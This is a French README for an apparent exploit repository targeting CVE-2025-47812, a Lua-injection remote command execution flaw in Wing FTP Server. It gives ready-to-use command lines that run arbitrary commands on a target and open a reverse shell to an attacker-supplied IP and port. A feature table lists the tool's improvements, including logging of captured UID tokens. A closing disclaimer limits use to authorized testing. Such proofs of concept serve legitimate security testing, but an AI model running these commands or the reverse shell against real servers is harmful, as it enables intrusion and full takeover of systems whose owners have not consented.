
Exploit d'exécution de commandes à distance pour Wing FTP Server (CVE-2025-47812)
Ce dépôt fournit une preuve de concept d'exploitation pour CVE-2025-47812, une vulnérabilité d'exécution de commande à distance (RCE) dans Wing FTP Server. Un attaquant peut injecter et exécuter des commandes système arbitraires basées sur Lua en abusant du paramètre username lors de l'authentification, ce qui conduit à une exécution complète de code à distance.
found_uids.txtExécuter une commande shell simple :
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"
Déclencher un reverse shell :
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444
Mode dry-run (aucune requête ne sera envoyée) :
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run
| Fonctionnalité/Amélioration | Description |
|---|---|
| ✅ Analyse des arguments | Ajout du support CLI argparse pour le mode non interactif |
| 🔐 Validation des entrées | Vérifie la validité de l'URL/IP/port avant de tenter l'exploit |
| 📦 Refactorisation des en-têtes | Extraction des en-têtes HTTP dans une fonction réutilisable pour plus de cohérence |
| 📄 Journalisation des UID | Sauvegarde les jetons UID réussis dans found_uids.txt |
| 🧪 Mode Dry-Run | Permet des tests sécurisés sans envoyer de requêtes (--dry-run) |
| 🕒 Délai d'attente + nouvelles tentatives | Ajoute un délai d'attente de requête et des tentatives automatiques en cas d'échec |
| 🧼 Lisibilité des payloads | Reformattage de la chaîne d'injection Lua pour plus de clarté et de maintenance |
| 📊 Sortie structurée | Encapsulation des réponses du serveur et des informations de payload avec des délimiteurs pour une lecture facile |
| ⚠️ Vérifications des codes de statut | Avertit l'utilisateur si la cible renvoie des codes de statut HTTP inattendus |
| 📝 Système de journalisation | Remplace print() par le module logging Python pour un meilleur contrôle de la verbosité |
Ce projet est destiné uniquement à des tests de sécurité éducatifs et autorisés.
N'utilisez pas cet outil contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester.